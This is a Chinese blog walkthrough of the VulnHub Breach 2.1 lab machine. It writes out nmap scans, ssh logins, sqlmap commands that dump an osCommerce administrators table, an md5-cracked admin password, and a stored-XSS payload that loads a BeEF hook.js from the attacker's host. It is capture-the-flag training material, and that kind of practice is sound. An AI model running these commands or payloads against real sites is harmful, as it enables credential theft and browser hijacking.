Breach靶机详解

于 2024-09-23 09:22:07 发布
阅读量300 收藏 2
点赞数 9
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a666666688/article/details/142449696
版权

下载地址

https://www.vulnhub.com/entry/breach-21,159/

靶机配置

kali

虚拟网络编辑器

靶机

主机发现

arp-scan -l

端口扫描

nmap -sS -Pn -A -p- -n 192.168.110.151

访问ssh服务

ssh 192.168.110.151 -p 65535

发现账户密码,连接ssh

ssh peter@192.168.110.151 -p 65535

再次扫描端口后发现新开放的80端口

nmap -sS -Pn -A -p- -n 192.168.110.151

目录扫描

python dirsearch.py -u "http://192.168.110.151"

响应码200拼接访问

http://192.168.110.151/blog/

可能存在sql注入

测试

sqlmap -u "http://192.168.110.151/blog/index.php?search=1" --batch

爆破数据库

sqlmap -u "http://192.168.110.151/blog/index.php?search=1" --batch --dbs

爆破指定数据库

sqlmap -u http://192.168.110.151/blog/index.php?search=1 -D oscommerce --tables --batch

爆指定数据库表名

sqlmap -u "http://192.168.110.151/blog/index.php?search=1" --batch -D oscommerce -T osc_administrators --columns

爆破表下数据

sqlmap -u http://192.168.110.151/blog/index.php?search=1 -D oscommerce -T osc_administrators -C user_name,user_password --dump --batch

md5解密

https://www.somd5.com/?action=getpwd
admin

GETshell

注册页面输入

<script>alert(1);</script>

注册成功后点击成员

说明存在存储性漏洞

此处记得打快照,因为是存储型漏洞,出错会影响到之后

根据提示信息 我们注册框输入的xss语句如下

将127.0.0.1改成kali的ip地址

Username: <script src="http://192.168.110.128:3000/hook.js"></script>

Password: 111

E-Mail: 111

提交成功之后访问http://192.168.110.151/blog/members.html 即可触发漏洞

最近发现BEEF登不上了,用户名和密码明明正确但就是登不上去,最后发现是因为关联了MSF的原因,为什么会这样原因暂不知,先记录下来,要修复的话重装BEEF就可以了。

apt remove beef-xss
apt-get install beef-xss

启动程序

beef-xss

查看密码

vi /etc/beef-xss/config.yaml

登录后发现靶机已经上线

http://127.0.0.1:3000/ui/panel

靶机用的是firefox浏览器所以使用firefox模块

fasewer
关注
(VulnHub靶机通关)breach系列:breach-2.1细节通关方法
yang1234567898的博客
01-26 3649
靶机下载地址:https://download.vulnhub.com/breach/Breach-2_final2.1.zip 需要配置仅主机模式
breach靶机
Encild的博客
11-09 431
[2021 11 7] breach靶机端口扫描GetShell 目录 breach靶机 端口扫描 GetShell breach靶机 端口扫描 已知IP为192.168.110.140 直接扫描端口: sudo nmap -sF -p1-65535 192.168.110.140 访问80端口: 翻译: Initech 遭到破坏,董事会投票决定引入其内部的 Initech Cyber•• Consulting LLP 部门...
VulhubBreach 2.1靶机详解
weixin_62457642的博客
09-18 1190
靶机Breach 2.1速刷
Vulnhub靶场Breach1.0详解
m0_65712192的博客
02-14 1486
Vulnhub靶场Breach1.0详解
[B2R]Raven: 2靶机
weixin_43886198的博客
12-13 879
[B2R]Raven: 2 靶场地址 靶场信息 靶场描述 Raven 2 is an intermediate level boot2root VM. There are four flags to capture. After multiple breaches, Raven Security has taken extra steps to harden their web server to prevent hackers from getting in. Can you still breach R
Vulnhub: Raven 2 靶场渗透实战 Walkthrough By V.K.R(上)
weixin_52641450的博客
10-30 868
raven2 靶场 walkthrough by V.K.R
网络安全ctf比赛 学习资源整理,解题工具、比赛时间、解题思路、实战靶场、学习路线
2303_79055586的博客
04-29 640
培根密码:https://mothereff.in/bacon摩尔斯电码:http://www.zhongguosou.com/zonghe/moErSiCodeConverter.aspx盲文在线解密:https://www.dcode.fr/braille-alphabet凯撒密码:https://www.dcode.fr/caesar-cipher进制转换:https://tool.oschina.net/hexconvert/词频分析:https://quipqiup.com/
网络空间部队成立,网安工作者应该如何学习甚至加入呢?
白帽子佳奇的博客
06-04 1480
网络空间安全部队成立,网安牛回速归,对信息对抗感兴趣的小伙伴和还在校的大学生,你们的机会来啦。试想,大家以后可以报名参军,参加网络空间安全部队的选拔。所以,我觉得现在大家有必要提前学习和了解一下,美国的网络空间部队的培养计划和网络部队兵种的分类培养方案1. 基础教育网络安全原理课程内容:网络攻击类型、防御策略、加密技术概论、网络协议和应用。时间安排:4周,每周5课时。评估方式:每周小测试加最后的综合考试。系统与网络基础。
常用的网络安全靶场、工具箱、学习路线推荐
网络安全
04-18 3358
本公众号名称从“网络安全研究所”正式改为“网络安全实验室”有招聘需求的可以后台联系运营人员。对于想学习或者参加CTF比赛的朋友来说,CTF工具、练习靶场必不可少,今天给大家分享自己收藏的CTF资源,希望能对各位有所帮助。CTF在线工具首先给大家推荐我自己常用的3个CTF在线工具网站,内容齐全,收藏备用。1、CTF在线工具箱:http://ctf.ssleye.com/ 包含CTF比赛中常...
【vulnhub】---Breach-1.0靶机
qq_43168364的博客
08-22 1185
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:Breach-1.0靶机(192.168.110.140) 攻击机:kali Linux(192.168.15.129) 物理机IP:192.168.110.220 相关配置 由于该靶机用的是静态的ip,我们要访问的话需要改变主机的IP和他处于同一个网端,为了让物理机还可以访问互联网,我们给物理机添加上两个网卡 这样就OK了 二、信息收集 主机发现 该靶机已知IP地址无需主机发现 端
(vulnhub靶机通关)Breach系列:breach-1.0
yang1234567898的博客
01-22 4363
靶机下载地址:https://download.vulnhub.com/breach/Breach-1.0.zip 环境配置 根据作者描述,靶机配置了一个静态IP地址(192.168.110.140),需要仅主机适配器配置此子网 配置仅主机网卡为DHCP,子网地址192.168.110.0 注意:类型为仅主机的网卡才可以 VMware适配器改成以下地址 靶机和kali网络选仅主机模式 确实环境是否配置好 环境搞好,直接开干! 信息收集 扫端口 扫描.
靶机实战-Breach-1.0
滕财然的博客
03-25 2557
Breach-1.0靶机实战 文章目录Breach-1.0靶机实战1、主机发现2、端口扫描3、web服务(80端口)4、提权5、总结 1、主机发现 没有IP的话自行配置IP 2、端口扫描 发现开放了N多端口,可能做了端口防护,那直接尝试访问80端口 3、web服务(80端口) 查看页面源码: 发现疑似base64加密的字符串 尝试解密: 发现解出来又是个base64,继续解密,最后解密出...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8482
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
THUCNews中文文本分类数据集包含84万个新闻文档,共14个类别;基于此模型测
最新发布
09-30
THUCNews中文文本分类数据集包含84万个新闻文档,共14个类别;基于此模型测试BERT多个版本的分类性能_ TextClassifier
基于Java的uinshine-fill在线应用设计源码
09-30
该项目是一款基于Java的在线应用设计源码,名为uinshine-fill,集成了Java、JavaScript、HTML、CSS、Shell和Lua等多种编程语言。源码文件共计724个,其中Java文件占比最高,达到472个,紧随其后的是XML和JavaScript文件,分别为51个和47个。此外,还包括HTML、YML、Imports、Properties、JSON、TXT和CSS文件。
基于Java语言的zzyi-cp项目设计源码总结
09-30
该项目为基于Java语言的zzyi-cp设计源码,总计包含441个文件,涵盖382个Java源文件、51个XML配置文件、5个YAML文件、2个Git忽略文件以及1个IML文件。
Labview通过FINS tcp协议与欧姆龙PLC通讯,支持CIO区,W区,D区,布尔量,整数,浮点数,字符串读写操作,软件无
09-30
Labview通过FINS tcp协议与欧姆龙PLC通讯,支持CIO区,W区,D区,布尔量,整数,浮点数,字符串读写操作,软件无加密
基于asp.net的实验室设备管理系统设计与实现.docx
09-30
基于asp.net的实验室设备管理系统设计与实现.docx
HTTPS攻击方法详解:BEAST、CRIME、BREACH等
不过,BREACH更侧重于利用HTTP响应中的反射性内容,如网页中的动态内容,来逐步揭示加密的cookies或其他敏感信息。 防御这些攻击的方法包括: 1. 更新到最新版本的SSL/TLS协议,例如使用TLS 1.3,因为它解决了BEAST...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值